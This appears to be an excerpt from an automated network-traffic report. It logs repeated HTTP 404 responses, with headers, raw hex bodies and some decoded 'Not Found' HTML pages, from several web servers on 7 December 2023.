            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 14:53:04 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 14:53:09 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 14:53:10 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:19 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:22 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:25 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:53:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Dec 2023 14:53:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 